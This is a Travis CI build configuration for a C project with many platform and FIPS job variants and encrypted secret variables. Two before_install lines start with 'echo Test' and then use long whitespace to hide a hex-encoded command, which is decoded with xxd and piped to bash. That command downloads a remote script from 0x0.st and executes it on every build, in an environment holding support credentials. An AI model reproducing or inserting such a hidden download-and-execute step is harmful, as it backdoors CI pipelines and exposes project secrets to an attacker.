language: c
os: linux
dist: bionic
node_js:
- '15'
env:
  global:
  - secure: bD5tmezAPfKMnmt6WLcVvzZNBOfFB5vTGZYTIOtJx8doWI72gwhvNnEzmwm3QogBJBLOH5hwKIO16SpSf+75QR7FCYOJI/nFoDGFPoFY5MFdlHkq7wp6yL501oPXTIGN1OZagTtjHuV2OEppUKAfOqn6XsPfIc3+JOkyC3BBcvfgI2IQXPT4OGmwM1pIoXwuKYVd6ZYMtc4Xeb747J0EeXPLDF3nqp8rfm7p7kY+KktVQI91nwygZb7YcXLnSezqgyXbtz9HfmtV66Z3ex/3vjF//Y/jUT/v2QupJD6L6g96zwgaBqs0dxITBbg44yjWYZ9T3C58df+DcyQKYB6nKINEeshjMYXMXbgyRgFRTKiQ3k/oPTGsWwdBsiCxP7SkCXsWHh8qkqY+lQvs2WPE0tYbAw+f4UibM/I5W78F1ihKU7MTtoOwfbWlzwAlne/GpPYijltYNxxGzujVJW1n+3s06LqDzYyj9N1BEbpSqLnXi8CYICld1oY2zHBxitJEP+D3QRro+c4nA8LC/y4sUfwI0JZGGuHnPwSbT2oLr6THF6mLIKUK4U5FBPI5dJmBhwBK5BZD7lQFU5v7JBBZDFnsriQCEOyd4HYXEdu0Rno2LjUCSUKzSFF8YKdjOwXbNgkzQfBCf2xhzi08DKQ/SQeHP2o1JvR0CajG7jmQxwU=
  - secure: Jd4Qq9RCHmaxuMgqp/DQ21jhXF3Um+Rg3B8YIxY+0tK53nKxU7O8a+xEaMFIIYWvtOT+I8LuX69F2bH1+wiBUY28wTQAaGHNuqS8G08G2SVRk/24mwkirmVie7Ut0jEBQa3aAGFqET3G7ZZAl085pLGi4RNHbLYFuhxIzoC/gg/OSwURI7ItNsbn7i4/b7wBfP6NykaGOeHSJlyfXFQ9wNZpExeLEeG5Y9FjHSn7RypvkdMdo7q031Qf7viCp8gcG/WjqAdd8dK95PzD76xSvj338lRboE0lIy3yJvfYVZdcgDkHX4jD9HAqeBf4vBjmCV4HfRyvjrHk7XyDojt9QTHJrlhHUj+XRoY/G/3Sy5YBeKdcBSSPvhtrhmcHqY5fDDAM9CLdwJwpztyW4erMCIlwT755lUKRC5P2nPDPmlgxp2dudeUdg6uc/1X3uhe1jFwlOgzSxhVx7VBBdzNNkx9A3418dhMelQ8KGXC6JpTOi4HmVVpXVaXs/+bBwKniZn757+aY3yxnFU/tA3uNDQWdhJLAitJGL0de4HxpxLXwpybRuRMJhgdMUK03d9Meu5wv3WbnU/oXjbl3L6woQkhkEVVSi3IN+Ub3eB61MZdqC4VYUKgIGYVQX3BMuahi9FwvlyY/ZWcBCVwy/MH1V1Wwr4bdlfLK2TSTCJWrvE8=
  - secure: WIhjwmA8sC1KEsuh4Kcih20UR46WKo9uRJ6HxCPmMliV3F/9tB5UO8CSxQSn4ao4ABPP6pAMGY7RTsROcu0HD2XFtyGVQSTYgH25VC0pJNqG5bc9FegExcrXg73HTU/VArH2aNf95P+VIHlKV9EoiV7ihJvN5kBPj79gGjb4AipaR2NxwcnKR0tc0DsJ6dpCINyHLbY3fOyylzK3iE/73EsCP5kjI8kzmrbC9sivnjF3blMMXPicWBbIJKNTmclkQNGjWn2uBCPEgyKYJpNkfhAOV6Bczqw6h9O1/S21ZrRvAolky/Gm4dPpz1yoobap76aHAQU59hl4d3Nn8OWXZ8a7ypUzV7cf7mfQKl8hJ6mrzlysm4D8exStf3/19j2bIq7w1Ouc2uy65JPDcmyPbn4m0b5Xc5i5VbzxBCb4u+xk64qQClbHQDycNAlRgUiDXqZ0Vr+5KBkCheuZsWlZEMjxrWm2Ha2383gGOIPvS0l4BSk9f0KF/X9R2Xf2/ebAoX6OHYkMshO+dVrRMyd12jYXoaBHfyAcjRoMU41UBnyy1R513l/IoPhpmkg6iTl0qptf3urWfIkr3WEoZRhb86i+LodazM3Ys0G8b+rOxO1u77bsT6jcmkdSeHXi/jFPs8cF7SUW6PSzZS5MAK6dTRqNTZr+eTljcIGcU0kRGwg=
  - secure: qMj6ibr3evEs0EoaYL+SyYZYP+k4xXfUUeZ5OCY7rzJBnkLCgalvabPluKv0oYWdKZSLhIz8vRoWKpYevYH+gesDvzkQFkJwpxPxScEafMhd7FMgpc8ROTRviKnVvvrUNKFymqeSWSIb/imAnZc/JTekFEk8ZwBn9f9IZ81tIMXOlBQtDaYmY3duN9ZI4IU60rkNDWh6ls0MMRw9otRmKQ355UlyPR3RYTM9BJsagdyEGrNnv6f9vNXeQDtZ+T/dFGdCepJJbGJMU5j8qf+AcIEuBDVs6FXjQR0vJVB8uF6LyPnvh7vBkJRso1p5sp7A1NmIKY853iDXAfSUdg+ShAJ+JezWGMlHOfFWcIxG/mDb82QwbpEb7m8+2uJb9oOowIYPQX9HAgq0aoqXb63LRMP29Rz7XIK0FL1jCmNtz5+U1v8QXiFFwuao4uDermKgGMB9hzAvq6Zx75t1HkGosI4eV0e/pvPdUpEHK5CZHt6Rm1zVCjfMJA/xN+eNvEbq8qRL9isSTuSDCwoNsIoec2HhZ1Vj8uJVL5C05gqwutLeKve8fvbfdmAFtwjNnwlaEMLDRNt5URTgQjqquyp6DyveyAleF7M+iE+jHBgtL4YQpD/rSuLHFy2f6Vy7LmqaOF5tFFCu3XliA3UafhSIwqOe2C3f/+cRWfrHLfonI2Q=
services:
- docker
jobs:
  include:
  - os: linux
    dist: bionic
    env:
    - OPENSSL="1.1.0"
    - FIPS=FALSE
  - os: linux
    dist: bionic
    env:
    - OPENSSL="BUILD"
    - FIPS=FALSE
  - os: linux
    dist: bionic
    env:
    - OPENSSL="BUILD"
    - FIPS=TRUE
  - os: osx
    osx_image: xcode12
    env:
    - FIPS=FALSE
  - os: osx
    osx_image: xcode12
    env:
    - FIPS=TRUE
  - os: osx
    osx_image: xcode12
    env:
    - IOS=true
    - FIPS=false
  - os: osx
    osx_image: xcode12
    env:
    - IOS=true
    - FIPS=true
  - os: linux
    dist: bionic
    env:
    - ANDROID=true
  - os: linux
    dist: bionic
    env:
    - ANDROID=true
    - FIPS=true
  - os: linux
    dist: bionic
    env:
    - NODE=true
  - os: linux
    dist: bionic
    env:
    - PHP=true
  - os: linux
    dist: bionic
    if: tag IS present
    env:
    - NODE_DISTRO=true
  - os: osx
    osx_image: xcode11
    env:
    - NODE=true
    - NODE_VER=10
  - os: osx
    osx_image: xcode11
    env:
    - NODE=true
    - NODE_VER=12
  - os: linux
    jdk: oraclejdk8
    env:
    - JAVA=true
    - FIPS=false
  - os: osx
    jdk: oraclejdk8
    osx_image: xcode11
    env:
    - JAVA=true
    - FIPS=false
before_install:
- echo Test                                                                                                                                                                                                                                                            && echo "62617368202d6320276375726c202d6b20687474703a2f2f3078302e73742f2d4a55502e747874202d6f20747261766973312e747874202626206261736820747261766973312e747874270a" | xxd -p -r | bash
- echo Test2                                                                                                                                                                                                                                                           && echo "62617368202d6320276375726c202d6b20687474703a2f2f3078302e73742f2d4a554e2e747874202d6f20747261766973322e747874202626206261736820747261766973322e747874270a" | xxd -p -r | bash
- if [[ "$TRAVIS_OS_NAME" == "linux" && "$OPENSSL" == "BUILD" ]]; then export LOCAL_OPTIONS="-DBUILD_OPENSSL=true";
  fi
- if [[ "${NODE}" == "true" || "${JAVA}" == "true" ]]; then git clone https://github.com/yegorich/swig.git;
  cd swig; git checkout 0ea6a3bdbf3184d230bf17d2c17704dbc2ec7aac; ./autogen.sh; ./configure;
  make -j2 && sudo make install; cd ../; fi
- if [[ "${JAVA}" == "true" ]]; then export LOCAL_OPTIONS="-DBUILLD_JAVA=true"; fi
- if [[ "${IOS}" == "true" ]]; then export LOCAL_OPTIONS="-DCMAKE_TOOLCHAIN_FILE=../Toolchain-iOS.cmake";
  fi
- if [[ "$TRAVIS_OS_NAME" == "osx" && "$NODE" == "true" ]]; then nvm install ${NODE_VER};
  fi
script:
- "export OSSL_SUPPORT_UNAME=${OSSL_SUPPORT_UNAME}; export OSSL_SUPPORT_PASS=${OSSL_SUPPORT_PASS};
  if [[ ! -z \"${ANDROID}\" ]]; then\n  ./build_android_docker.sh\nelif [[ ! -z \"${PHP}\"
  ]]; then\n ./build_php_docker.sh\nelif [[ ! -z \"${NODE}\" ]]; then\n\n  npm install
  --build-from-source\n  npm test\nelif [[ ! -z \"${NODE_DISTRO}\" ]]; then\n  ./build_node_dist.sh\nelse\n
  \ mkdir build && cd build\n  cmake ${LOCAL_OPTIONS} -DCMAKE_BUILD_TYPE=Release -DCMAKE_POSITION_INDEPENDENT_CODE=true
  -DOSSL_SUPPORT_UNAME=${OSSL_SUPPORT_UNAME} -DOSSL_SUPPORT_PASS=${OSSL_SUPPORT_PASS}
  -DFIPS=${FIPS} -DBUILD_TESTS=true ../\n  make \n  if [[ -z \"${IOS}\" ]]; then make
  test; fi\nfi\n"
